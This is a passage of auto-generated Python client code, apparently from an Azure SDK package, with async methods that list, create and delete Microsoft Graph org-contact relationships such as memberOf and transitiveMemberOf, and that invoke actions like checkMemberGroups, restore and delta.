}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore
def list_member_of(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum10"]]] = None,
select: Optional[List[Union[str, "models.Enum11"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfDirectoryObject0"]:
"""Get memberOf from contacts.
Get memberOf from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum10]
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum11]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfDirectoryObject0 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject0]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject0"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfDirectoryObject0', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf'} # type: ignore
def list_ref_member_of(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum12"]]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject0"]:
"""Get ref of memberOf from contacts.
Get ref of memberOf from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum12]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfLinksOfDirectoryObject0 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject0]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject0"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_ref_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject0', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ref_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf/$ref'} # type: ignore
async def create_ref_member_of(
self,
org_contact_id: str,
body: Dict[str, object],
**kwargs
) -> Dict[str, object]:
"""Create new navigation property ref to memberOf for contacts.
Create new navigation property ref to memberOf for contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: New navigation property ref value.
:type body: dict[str, object]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: dict mapping str to object, or the result of cls(response)
:rtype: dict[str, object]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_ref_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, '{object}')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('{object}', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_ref_member_of.metadata = {'url': '/contacts/{orgContact-id}/memberOf/$ref'} # type: ignore
async def check_member_groups(
self,
org_contact_id: str,
body: "models.Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List[str]:
"""Invoke action checkMemberGroups.
Invoke action checkMemberGroups.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.check_member_groups.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths175Njh2ContactsOrgcontactIdMicrosoftGraphCheckmembergroupsPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_member_groups.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.checkMemberGroups'} # type: ignore
async def check_member_objects(
self,
org_contact_id: str,
body: "models.Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List[str]:
"""Invoke action checkMemberObjects.
Invoke action checkMemberObjects.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.check_member_objects.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths8Ke2VbContactsOrgcontactIdMicrosoftGraphCheckmemberobjectsPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_member_objects.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.checkMemberObjects'} # type: ignore
async def get_member_groups(
self,
org_contact_id: str,
body: "models.Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List[str]:
"""Invoke action getMemberGroups.
Invoke action getMemberGroups.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.get_member_groups.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths3Y2P0KContactsOrgcontactIdMicrosoftGraphGetmembergroupsPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_member_groups.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.getMemberGroups'} # type: ignore
async def get_member_objects(
self,
org_contact_id: str,
body: "models.Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List[str]:
"""Invoke action getMemberObjects.
Invoke action getMemberObjects.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of str, or the result of cls(response)
:rtype: list[str]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.get_member_objects.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths1M18OhpContactsOrgcontactIdMicrosoftGraphGetmemberobjectsPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[str]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_member_objects.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.getMemberObjects'} # type: ignore
async def restore(
self,
org_contact_id: str,
**kwargs
) -> "models.MicrosoftGraphDirectoryObject":
"""Invoke action restore.
Invoke action restore.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphDirectoryObject, or the result of cls(response)
:rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryObject
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.restore.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphDirectoryObject', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore.metadata = {'url': '/contacts/{orgContact-id}/microsoft.graph.restore'} # type: ignore
def list_transitive_member_of(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum13"]]] = None,
select: Optional[List[Union[str, "models.Enum14"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfDirectoryObject1"]:
"""Get transitiveMemberOf from contacts.
Get transitiveMemberOf from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum13]
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum14]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfDirectoryObject1 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject1]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject1"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_transitive_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfDirectoryObject1', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf'} # type: ignore
def list_ref_transitive_member_of(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum15"]]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject1"]:
"""Get ref of transitiveMemberOf from contacts.
Get ref of transitiveMemberOf from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum15]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfLinksOfDirectoryObject1 or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject1]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject1"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_ref_transitive_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject1', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ref_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf/$ref'} # type: ignore
async def create_ref_transitive_member_of(
self,
org_contact_id: str,
body: Dict[str, object],
**kwargs
) -> Dict[str, object]:
"""Create new navigation property ref to transitiveMemberOf for contacts.
Create new navigation property ref to transitiveMemberOf for contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: New navigation property ref value.
:type body: dict[str, object]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: dict mapping str to object, or the result of cls(response)
:rtype: dict[str, object]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_ref_transitive_member_of.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, '{object}')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('{object}', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_ref_transitive_member_of.metadata = {'url': '/contacts/{orgContact-id}/transitiveMemberOf/$ref'} # type: ignore
async def delta(
self,
**kwargs
) -> List["models.MicrosoftGraphOrgContact"]:
"""Invoke function delta.
Invoke function delta.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of MicrosoftGraphOrgContact, or the result of cls(response)
:rtype: list[~identity_directory_management.models.MicrosoftGraphOrgContact]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphOrgContact"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delta.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[MicrosoftGraphOrgContact]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delta.metadata = {'url': '/contacts/microsoft.graph.delta()'} # type: ignore
async def get_available_extension_properties(
self,
body: "models.Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema",
**kwargs
) -> List["models.MicrosoftGraphExtensionProperty"]:
"""Invoke action getAvailableExtensionProperties.
Invoke action getAvailableExtensionProperties.
:param body: Action parameters.
:type body: ~identity_directory_management.models.Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of MicrosoftGraphExtensionProperty, or the result of cls(response)
:rtype: list[~identity_directory_management.models.MicrosoftGraphExtensionProperty]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["models.MicrosoftGraphExtensionProperty"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.get_available_extension_properties.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'Paths1L581IfContactsMicrosoftGraphGetavailableextensionpropertiesPostRequestbodyContentApplicationJsonSchema')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
